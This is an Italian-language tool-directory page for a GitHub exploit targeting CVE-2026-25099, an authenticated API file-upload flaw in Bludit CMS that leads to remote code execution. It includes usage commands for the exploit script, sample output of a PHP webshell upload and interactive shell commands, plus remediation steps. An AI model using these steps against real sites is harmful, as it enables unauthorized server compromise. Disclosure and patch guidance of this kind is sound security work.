Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/yahiahamza/cve-2026-25099
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubyahiahamza/cve-2026-25099

CVE-2026-25099

# Exploit Python per Bludit CMS: caricamento file senza restrizioni tramite API che porta a esecuzione remota di codice, fornendo esecuzione di comandi e shell interattiva per test autorizzati.

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-25099 - Bludit CMS API Upload di File Non Restretto a RCE

Descrizione

Le versioni di Bludit CMS precedenti alla 3.18.4 consentono a un attaccante autenticato con un token API valido di caricare file di qualsiasi tipo ed estensione tramite l'endpoint POST /api/files/<page-key>. La funzione uploadFile() non esegue alcuna validazione sull'estensione o sul contenuto dei file, consentendo il caricamento di webshell PHP che possono essere eseguite come www-data.

Versioni Interessate

  • Vulnerabili: Bludit < 3.18.4
  • Corretta: Bludit 3.18.4
  • Prerequisito: Token API valido (visibile nel pannello di amministrazione sotto Plugin → API)

Utilizzo

root@kitploit:~
# Esecuzione di un singolo comando
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN" -c "id"

# Shell interattiva
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN"

Esempio di Output

root@kitploit:~
[*] CVE-2026-25099 - Bludit CMS API File Upload to RCE
[*] Target: http://target
[*] Recupero della chiave della pagina...
[+] Chiave della pagina: create-your-own-content
[*] Caricamento della webshell...
[+] Shell caricata: http://target/bl-content/uploads/pages/create-your-own-content/abcdefgh.php
[*] Verifica della RCE...
[+] RCE confermata: uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Shell interattiva (digita 'exit' per uscire)

shell> whoami
www-data
shell> grep BLUDIT_VERSION /var/www/html/bl-kernel/boot/init.php
define('BLUDIT_VERSION', '3.18.2');

Screenshot

PoC Execution

Rimedio

  • Aggiornare a Bludit 3.18.4 o successivo
  • Disabilitare il plugin API se non necessario
  • Monitorare /bl-content/uploads/ per file PHP inattesi

Riferimenti

  • CVE-2026-25099 su MITRE
  • Analisi Tecnica - yh.do

Autore

Yahia Hamza - https://yh.do

Disclaimer

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. Utilizzalo in modo responsabile e solo contro sistemi su cui hai il permesso di effettuare test.

Scarica lo strumento